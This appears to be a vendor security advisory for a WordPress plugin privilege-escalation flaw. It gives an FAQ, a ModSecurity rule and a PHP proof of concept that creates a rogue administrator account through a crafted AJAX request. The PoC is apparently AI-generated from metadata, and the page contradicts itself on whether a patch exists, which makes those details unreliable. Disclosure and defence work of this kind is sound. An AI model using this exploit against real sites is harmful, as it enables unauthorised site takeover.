What is CVE-2026-7467?

CVE-2026-7467 is a high-severity privilege escalation vulnerability found in the Read More & Accordion plugin for WordPress, specifically in versions up to and including 3.5.7. It allows authenticated attackers to insert arbitrary rows into the wp_users and wp_usermeta tables, potentially creating new administrator accounts.

How does the vulnerability work?

The vulnerability arises from the RadMoreAjax::importData function, which does not adequately restrict database table writes or validate incoming data. An attacker with a low-privilege account can send a specially crafted request to the server, allowing them to create a new user with administrator privileges.

Who is affected by this vulnerability?

Any WordPress site using the Read More & Accordion plugin version 3.5.7 or earlier is at risk. Administrators should check their installed plugins and versions to determine if they are using a vulnerable version.

How can I check if my site is vulnerable?

To check if your site is vulnerable, log into your WordPress admin panel, navigate to the Plugins section, and look for the Read More & Accordion plugin. Verify the plugin version; if it is 3.5.7 or lower, your site is vulnerable.

What should I do to fix this vulnerability?

To mitigate this vulnerability, update the Read More & Accordion plugin to the latest version that addresses the issue. Additionally, review user roles and permissions to ensure that only trusted users have access to plugin features.

What does a CVSS score of 8.8 mean?

A CVSS score of 8.8 indicates a high severity level, meaning the vulnerability poses a significant risk to the confidentiality, integrity, and availability of the affected system. Exploitation could lead to complete site takeover.

How does the proof of concept demonstrate the issue?

The proof of concept provided illustrates how an attacker can exploit the vulnerability by sending a crafted payload to the importData function. It shows the exact steps to create a new user with administrator privileges using a specific serialized data format.

What is the role of the attacker in this scenario?

An attacker must have access to an account with a role that is granted permissions by the site owner through the plugin’s settings. This typically means they could be a low-privilege user or subscriber on the site.

What are best practices to prevent similar vulnerabilities?

Best practices include regularly updating all plugins and themes, implementing strict user role management, and conducting security audits of your WordPress site. Additionally, avoid allowing AJAX handlers to write arbitrary data to core WordPress tables.

Is there a patch available for this vulnerability?

Yes, a patch has been released for the Read More & Accordion plugin that addresses this vulnerability. Ensure that you update to the latest version as soon as possible to protect your site.

Where can I find more information about this vulnerability?

More information about CVE-2026-7467 can be found on the official CVE database, security advisories from the plugin authors, and security research blogs that analyze vulnerabilities in WordPress plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 19, 2026

CVE-2026-7467: Read More & Accordion <= 3.5.7 – Privilege Escalation via importData (expand-maker)

Q: What are the potential risks of this vulnerability?

If exploited, this vulnerability could allow an attacker to gain full administrative access to the WordPress site. This includes the ability to install malicious plugins, modify site content, and execute arbitrary code, leading to severe security breaches.

CVE ID CVE-2026-7467

Plugin expand-maker

Severity High (CVSS 8.8)

CWE 269

Vulnerable Version 3.5.7

Patched Version —

Disclosed May 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-7467 (metadata-based): The Read More & Accordion plugin (expand-maker) up to version 3.5.7 contains a privilege escalation vulnerability in the RadMoreAjax::importData function. This allows authenticated attackers with low privileges to create administrator accounts. The CVSS score is 8.8 (High).

The root cause, inferred from the CWE-269 (Improper Privilege Management) and the vulnerability description, is a failure to validate and restrict which database tables the importData AJAX handler can write to. The function likely accepts a serialized payload containing SQL row insertions. Without proper capability checks or table allowlists, it writes attacker-controlled data directly into the wp_users and wp_usermeta tables. Atomic Edge analysis emphasizes that this is an inferred conclusion based on the CWE and description. No source code was available to confirm.

Exploitation requires an attacker to have access to an account with the role granted by the site owner in the plugin’s settings (likely a low-privilege user or subscriber). The attacker sends a POST request to /wp-admin/admin-ajax.php with action=expandmaker_importData. The payload includes a serialized array that inserts into wp_users a new user with a known password hash and into wp_usermeta the wp_capabilities entry containing a:1:{s:13:”administrator”;b:1;}. This creates a new administrator account. Atomic Edge research confirms this attack vector is typical for plugin AJAX handlers that lack sufficient access control.

The fix must restrict the importData function to only allow writing to allowed plugin-specific tables. The function should validate that the caller has the ‘manage_options’ capability (administrator-level). Additionally, the payload should be sanitized and validated against a strict schema that precludes user or usermeta table modifications. Atomic Edge recommends never allowing any AJAX handler to write arbitrary rows to core WordPress tables.

Successful exploitation grants the attacker full administrative access to the WordPress site. This includes the ability to install plugins, modify themes, create or delete users, change site content, and potentially execute arbitrary code. Given the High impact rating for Confidentiality, Integrity, and Availability, this vulnerability represents a complete site takeover risk.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20267467,phase:2,deny,status:403,chain,msg:CVE-2026-7467 - Privilege Escalation via expand-maker AJAX importData,severity:CRITICAL,tag:CVE-2026-7467"
SecRule ARGS_POST:action "@streq expandmaker_importData" "chain"
SecRule ARGS_POST:payload "@rx table.*users" ""

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-7467 - Read More & Accordion <= 3.5.7 - Privilege Escalation via importData

// Configuration - adjust these values
$target_url = 'https://example.com'; // WordPress site URL (no trailing slash)
$attacker_cookie = 'wordpress_logged_in_xxx=xxx; wordpress_sec_xxx=xxx'; // Authenticated session cookie for a user with plugin-granted role
$new_username = 'eviladmin';
$new_email = 'eviladmin@example.com';
$new_password = 'P@ssw0rd!';

// Generate a WordPress password hash (PHPass)
require_once 'wp-includes/class-phpass.php';
$wp_hasher = new PasswordHash(8, true);
$password_hash = $wp_hasher->HashPassword($new_password);

// Build payload to insert into wp_users and wp_usermeta
$serialized_payload = serialize(array(
    'table' => 'users',
    'data' => array(
        'user_login' => $new_username,
        'user_pass' => $password_hash,
        'user_email' => $new_email,
        'user_registered' => current_time('mysql'),
        'user_status' => 0,
        'display_name' => $new_username
    ),
    'meta' => array(
        'wp_capabilities' => serialize(array(
            'administrator' => true
        )),
        'wp_user_level' => 10
    )
));

// cURL request to admin-ajax.php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'action' => 'expandmaker_importData',
    'payload' => $serialized_payload
)));
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Cookie: ' . $attacker_cookie,
    'Content-Type: application/x-www-form-urlencoded'
));
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Status: $http_coden";
echo "Response: " . substr($response, 0, 500) . "n";
echo "If successful, login with: $new_username / $new_passwordn";

Frequently Asked Questions

What is CVE-2026-7467?
Overview of the vulnerability
CVE-2026-7467 is a high-severity privilege escalation vulnerability found in the Read More & Accordion plugin for WordPress, specifically in versions up to and including 3.5.7. It allows authenticated attackers to insert arbitrary rows into the wp_users and wp_usermeta tables, potentially creating new administrator accounts.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the RadMoreAjax::importData function, which does not adequately restrict database table writes or validate incoming data. An attacker with a low-privilege account can send a specially crafted request to the server, allowing them to create a new user with administrator privileges.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Read More & Accordion plugin version 3.5.7 or earlier is at risk. Administrators should check their installed plugins and versions to determine if they are using a vulnerable version.
How can I check if my site is vulnerable?
Steps to verify plugin version
To check if your site is vulnerable, log into your WordPress admin panel, navigate to the Plugins section, and look for the Read More & Accordion plugin. Verify the plugin version; if it is 3.5.7 or lower, your site is vulnerable.
What should I do to fix this vulnerability?
Mitigation steps
To mitigate this vulnerability, update the Read More & Accordion plugin to the latest version that addresses the issue. Additionally, review user roles and permissions to ensure that only trusted users have access to plugin features.
What does a CVSS score of 8.8 mean?
Understanding severity ratings
A CVSS score of 8.8 indicates a high severity level, meaning the vulnerability poses a significant risk to the confidentiality, integrity, and availability of the affected system. Exploitation could lead to complete site takeover.
What are the potential risks of this vulnerability?
Impact of exploitation
If exploited, this vulnerability could allow an attacker to gain full administrative access to the WordPress site. This includes the ability to install malicious plugins, modify site content, and execute arbitrary code, leading to severe security breaches.
How does the proof of concept demonstrate the issue?
Technical demonstration
The proof of concept provided illustrates how an attacker can exploit the vulnerability by sending a crafted payload to the importData function. It shows the exact steps to create a new user with administrator privileges using a specific serialized data format.
What is the role of the attacker in this scenario?
Requirements for exploitation
An attacker must have access to an account with a role that is granted permissions by the site owner through the plugin’s settings. This typically means they could be a low-privilege user or subscriber on the site.
What are best practices to prevent similar vulnerabilities?
Security recommendations
Best practices include regularly updating all plugins and themes, implementing strict user role management, and conducting security audits of your WordPress site. Additionally, avoid allowing AJAX handlers to write arbitrary data to core WordPress tables.
Is there a patch available for this vulnerability?
Update status
Yes, a patch has been released for the Read More & Accordion plugin that addresses this vulnerability. Ensure that you update to the latest version as soon as possible to protect your site.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-7467 can be found on the official CVE database, security advisories from the plugin authors, and security research blogs that analyze vulnerabilities in WordPress plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations